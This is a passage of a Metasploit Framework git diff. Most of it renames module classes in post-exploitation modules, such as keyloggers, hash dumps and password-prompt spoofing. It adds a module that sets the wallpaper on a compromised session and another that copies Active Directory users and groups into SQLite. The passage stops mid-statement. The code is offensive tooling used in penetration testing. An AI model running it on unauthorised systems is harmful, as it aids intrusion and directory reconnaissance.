b/modules/post/multi/manage/set_wallpaper.rb new file mode 100644 index 0000000000..0008a53ab7 --- /dev/null +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Multi Manage Set Wallpaper', + 'Description' => %q( + This module will set the desktop wallpaper background on the specified session. + The method of setting the wallpaper depends on the platform type. + ), + 'License' => MSF_LICENSE, + 'Author' => [ 'timwr'], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], + 'SessionTypes' => [ 'meterpreter' ] + ) + ) + + register_options( + [ + OptPath.new('WALLPAPER_FILE', [true, 'The local wallpaper file to set on the remote session']) + ], self.class) + end + + def upload_wallpaper(tempdir, file) + remote_file = "#{tempdir}#{File.basename(file)}" + print_status("#{peer} - Uploading to #{remote_file}") + + write_file(remote_file, File.binread(file)) + print_status("#{peer} - Uploaded to #{remote_file}") + remote_file + end + + # + # The OS X version uses an AppleScript to do this + # + def osx_set_wallpaper(file) + remote_file = upload_wallpaper("/tmp/", file) + script = %(osascript -e 'tell application "Finder" to set desktop picture to POSIX file "#{remote_file}"') + begin + cmd_exec(script) + rescue EOFError + return false + end + true + end + + # + # The Windows version uses the SystemParametersInfo call + # + def win_set_wallpaper(file) + remote_file = upload_wallpaper("%TEMP%\\", file) + client.railgun.user32.SystemParametersInfoA(0x0014, nil, remote_file, 0x2) != 0 + end + + # + # The Android version uses the set_wallpaper command + # + def android_set_wallpaper(file) + client.android.set_wallpaper(File.binread(file)) + true + end + + def os_set_wallpaper(file) + if session.type =~ /meterpreter/ && session.sys.config.sysinfo['OS'] =~ /darwin/i + platform = 'osx' + else + platform = session.platform + end + case platform + when /osx/ + osx_set_wallpaper(file) + when /win/ + win_set_wallpaper(file) + when /android/ + android_set_wallpaper(file) + end + end + + def run + file = datastore['WALLPAPER_FILE'] + if os_set_wallpaper(file) + print_good("#{peer} - The wallpaper has been set") + else + print_error("#{peer} - Unable to set the wallpaper") + end + end +end diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index bcc5a44ed6..aa19dd6eb7 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Exploit::Powershell include Post::Windows::Powershell diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index afa83fcea1..fdb85616f2 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 7042d04d9f..894d7c538e 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb index 823c8b71e4..eeb0a2087a 100644 --- a/modules/post/multi/recon/local_exploit_suggester.rb +++ b/modules/post/multi/recon/local_exploit_suggester.rb @@ -7,7 +7,7 @@ require 'msf/core' include Msf::Auxiliary::Report -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/admin/say.rb b/modules/post/osx/admin/say.rb index 2d11de9201..d5438ac54e 100644 --- a/modules/post/osx/admin/say.rb +++ b/modules/post/osx/admin/say.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/osx/capture/keylog_recorder.rb b/modules/post/osx/capture/keylog_recorder.rb index 2f7e3c1710..f4c01bd106 100644 --- a/modules/post/osx/capture/keylog_recorder.rb +++ b/modules/post/osx/capture/keylog_recorder.rb @@ -5,7 +5,7 @@ require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/capture/screen.rb b/modules/post/osx/capture/screen.rb index 02ce7c8cdf..467adc9572 100644 --- a/modules/post/osx/capture/screen.rb +++ b/modules/post/osx/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index 88546475f6..708cfde81d 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File # extract/verify by by XORing your kcpassword with your password diff --git a/modules/post/osx/gather/enum_adium.rb b/modules/post/osx/gather/enum_adium.rb index f6b668343a..f498e9dee0 100644 --- a/modules/post/osx/gather/enum_adium.rb +++ b/modules/post/osx/gather/enum_adium.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index 3a59f7ae1e..795098850d 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index f572a2d64a..9022522173 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb index 27197533b5..6e46582d28 100644 --- a/modules/post/osx/gather/enum_colloquy.rb +++ b/modules/post/osx/gather/enum_colloquy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index a4fbe15cc5..93b173aea9 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::OSX::System include Msf::Exploit::FileDropper diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index fa87e2c46c..c4d89e9b16 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 4125e961ac..7d169c573a 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post # set of accounts to ignore while pilfering data OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb index 1ba4c2be21..fd0474bd38 100644 --- a/modules/post/osx/gather/password_prompt_spoof.rb +++ b/modules/post/osx/gather/password_prompt_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 1763927d2d..26e48f2357 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb index 4db60b33c1..b6751b6d7e 100644 --- a/modules/post/osx/manage/mount_share.rb +++ b/modules/post/osx/manage/mount_share.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post # list of accepted file share protocols. other "special" URLs (like vnc://) will be ignored. FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp) diff --git a/modules/post/osx/manage/record_mic.rb b/modules/post/osx/manage/record_mic.rb index 6cf17e92ed..85f702f928 100644 --- a/modules/post/osx/manage/record_mic.rb +++ b/modules/post/osx/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/osx/manage/vpn.rb b/modules/post/osx/manage/vpn.rb index cff9656d91..c7d095ba0b 100644 --- a/modules/post/osx/manage/vpn.rb +++ b/modules/post/osx/manage/vpn.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/webcam.rb b/modules/post/osx/manage/webcam.rb index 973e2b24f7..5b8f9be4f1 100644 --- a/modules/post/osx/manage/webcam.rb +++ b/modules/post/osx/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 6a8a049fbe..cf2796a0c7 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index 9f3895a9a2..3e7857ba1a 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index cdbd17dd57..322d754938 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index 85e30d43b8..94f85bb769 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index 857ae41b71..6a3afe14fc 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index ba6680db44..2c829a3508 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/escalate/droplnk.rb b/modules/post/windows/escalate/droplnk.rb index 66c0028d56..f77a636064 100644 --- a/modules/post/windows/escalate/droplnk.rb +++ b/modules/post/windows/escalate/droplnk.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index a155bb9166..e7bebe5ad6 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/escalate/golden_ticket.rb b/modules/post/windows/escalate/golden_ticket.rb index 09abdec2b3..8d1dd0b530 100644 --- a/modules/post/windows/escalate/golden_ticket.rb +++ b/modules/post/windows/escalate/golden_ticket.rb @@ -3,7 +3,7 @@ require 'msf/core/post/windows/netapi' require 'msf/core/post/windows/kiwi' require 'msf/core/post/windows/error' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::NetAPI include Msf::Post::Windows::Accounts include Msf::Post::Windows::Kiwi diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index 928f36fccf..4aadfeb3fe 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index abb3304552..9cfc306460 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/ad_to_sqlite.rb b/modules/post/windows/gather/ad_to_sqlite.rb new file mode 100644 index 0000000000..5f84cad615 --- /dev/null +++ b/modules/post/windows/gather/ad_to_sqlite.rb @@ -0,0 +1,561 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' +require 'sqlite3' + +class MetasploitModule < Msf::Post + include Msf::Post::Windows::LDAP + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'AD Computer, Group and Recursive User Membership to Local SQLite DB', + 'Description' => %{ + This module will gather a list of AD groups, identify the users (taking into account recursion) + and write this to a SQLite database for offline analysis and query using normal SQL syntax. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options([ + OptString.new('GROUP_FILTER', [false, 'Additional LDAP filters to use when searching for initial groups', '']), + OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form to the console.', false]), + OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form to the console.', false]), + OptInt.new('THREADS', [true, 'Number of threads to spawn to gather membership of each group.', 20]) + ], self.class) + end + + # Entry point + def run + max_search = datastore['MAX_SEARCH'] + + db, dbfile = create_sqlite_db + print_status "Database created: #{dbfile}" + + # Download the list of groups from Active Directory + vprint_status "Retrieving AD Groups" + begin + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy', 'cn'] + if datastore['GROUP_FILTER'].nil? || datastore['GROUP_FILTER'].empty? + group_query = "(objectClass=group)" + else + group_query = "(&(objectClass=group)(#{datastore['GROUP_FILTER']}))" + end + groups = query(group_query, max_search, group_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error("Error(Group): #{e.message}") + return + end + + # If no groups were downloaded, there's no point carrying on + if groups.nil? || groups[:results].empty? + print_error('No AD groups were discovered') + return + end + + # Go through each of the groups and identify the individual users in each group + vprint_status "Groups retrieval completed: #{groups[:results].size} group(s)" + vprint_status "Retrieving AD Group Membership" + users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'comment', 'title', 'cn', 'adminCount', 'manager'] + + remaining_groups = groups[:results] + + # If the number of threads exceeds the number of groups, reduce them down to the correct number + threadcount = remaining_groups.count < datastore['THREADS'] ? remaining_groups.count : datastore['THREADS'] + + # Loop through each of the groups, creating threads where necessary + while !remaining_groups.nil? && !remaining_groups.empty? + group_gather = [] + 1.upto(threadcount) do + group_gather << framework.threads.spawn("Module(#{refname})", false, remaining_groups.shift) do |individual_group| + begin + + next if !individual_group || individual_group.empty? || individual_group.nil? + + # Get the Group RID + group_rid = get_rid(individual_group[1][:value]).to_i + + # Perform the ADSI query to retrieve the effective users in each group (recursion) + vprint_status "Retrieving members of #{individual_group[3][:value]}" + users_filter = "(&(objectCategory=person)(objectClass=user)(|(memberOf:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))" + users_in_group = query(users_filter, max_search, users_fields) + + grouptype_int = individual_group[7][:value].to_i # Set this here because it is used a lot below + sat_int = individual_group[2][:value].to_i + + # Add the group to the database + # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx + # Note that the conversions to UTF-8 are necessary because of the way SQLite detects column type affinity + # Turns out that the 'fix' is documented in https://github.com/rails/rails/issues/1965 + sql_param_group = { g_rid: group_rid, + g_distinguishedName: individual_group[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_sAMAccountType: sat_int, + g_sAMAccountName: individual_group[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_whenChanged: individual_group[4][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_whenCreated: individual_group[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_description: individual_group[6][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_groupType: grouptype_int, + g_adminCount: individual_group[8][:value].to_i, + g_comment: individual_group[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_managedBy: individual_group[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + g_cn: individual_group[11][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + # Specifies a group that is created by the system. + g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, + # Specifies a group with global scope. + g_GT_GROUP_SCOPE_GLOBAL: (grouptype_int & 0x00000002).zero? ? 0 : 1, + # Specifies a group with local scope. + g_GT_GROUP_SCOPE_LOCAL: (grouptype_int & 0x00000004).zero? ? 0 : 1, + # Specifies a group with universal scope. + g_GT_GROUP_SCOPE_UNIVERSAL: (grouptype_int & 0x00000008).zero? ? 0 : 1, + # Specifies an APP_BASIC group for Windows Server Authorization Manager. + g_GT_GROUP_SAM_APP_BASIC: (grouptype_int & 0x00000010).zero? ? 0 : 1, + # Specifies an APP_QUERY group for Windows Server Authorization Manager. + g_GT_GROUP_SAM_APP_QUERY: (grouptype_int & 0x00000020).zero? ? 0 : 1, + # Specifies a security group. If this flag is not set, then the group is a distribution group. + g_GT_GROUP_SECURITY: (grouptype_int & 0x80000000).zero? ? 0 : 1, + # The inverse of the flag above. Technically GT_GROUP_SECURITY=0 makes it a distribution + # group so this is arguably redundant, but I have included it for ease. It makes a lot more sense + # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that + # DISTRIBUTION is in fact the inverse of SECURITY...:) + g_GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? ? 1 : 0, + # Now add sAMAccountType constants + g_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0, + g_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0, + g_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0, + g_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0, + g_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0, + g_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0, + g_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0, + g_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0, + g_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0, + g_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0, + g_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0 + } + run_sqlite_query(db, 'ad_groups', sql_param_group) + + # Go through each group user + next if users_in_group[:results].empty? + users_in_group[:results].each do |group_user| + user_rid = get_rid(group_user[1][:value]).to_i + print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] + + uac_int = group_user[7][:value].to_i # Set this because it is used so frequently below + sat_int = group_user[2][:value].to_i + + # Add the group to the database + # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx + sql_param_user = { u_rid: user_rid, + u_distinguishedName: group_user[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_sAMAccountType: group_user[2][:value].to_i, + u_sAMAccountName: group_user[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_displayName: group_user[4][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_description: group_user[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_logonCount: group_user[6][:value].to_i, + u_userAccountControl: uac_int, + u_userPrincipalName: group_user[8][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_whenChanged: group_user[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_whenCreated: group_user[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_primaryGroupID: group_user[11][:value].to_i, + u_badPwdCount: group_user[12][:value].to_i, + u_comment: group_user[13][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_title: group_user[14][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + u_cn: group_user[15][:value].to_s.encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + # Indicates that a given object has had its ACLs changed to a more secure value by the + # system because it was a member of one of the administrative groups (directly or transitively). + u_adminCount: group_user[16][:value].to_i, + u_manager: group_user[17][:value].to_s.encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'), + # The login script is executed + u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + # The user account is disabled. + u_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + # The home directory is required. + u_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + # The account is currently locked out. + u_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + # No password is required. + u_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, + # The user cannot change the password. + u_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + # The user can send an encrypted password. + u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + # This is an account for users whose primary account is in another domain. This account + # provides user access to this domain, but not to any domain that trusts this domain. + # Also known as a local user account. + u_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + # This is a default account type that represents a typical user. + u_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + # This is a permit to trust account for a system domain that trusts other domains. + u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + # This is a computer account for a computer that is a member of this domain. + u_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + # This is a computer account for a system backup domain controller that is a member of this domain. + u_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + # The password for this account will never expire. + u_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + # This is an MNS logon account. + u_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + # The user must log on using a smart card. + u_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + # The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. + # Any such service can impersonate a client requesting the service. + u_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + # The security context of the user will not be delegated to a service even if the service + # account is set as trusted for Kerberos delegation. + u_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + # Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. + u_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + # This account does not require Kerberos pre-authentication for logon. + u_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + # The password has expired + u_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + # The account is enabled for delegation. This is a security-sensitive setting; accounts with + # this option enabled should be strictly controlled. This setting enables a service running + # under the account to assume a client identity and authenticate as that user to other remote + # servers on the network. + u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1, + # Now add sAMAccountType constants + u_SAM_DOMAIN_OBJECT: (sat_int == 0) ? 1 : 0, + u_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0, + u_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0, + u_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0, + u_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0, + u_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0, + u_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0, + u_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0, + u_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0, + u_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0, + u_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0 + } + run_sqlite_query(db, 'ad_users', sql_param_user) + + # Now associate the user with the group + sql_param_mapping = { user_rid: user_rid, + group_rid: group_rid + } + run_sqlite_query(db, 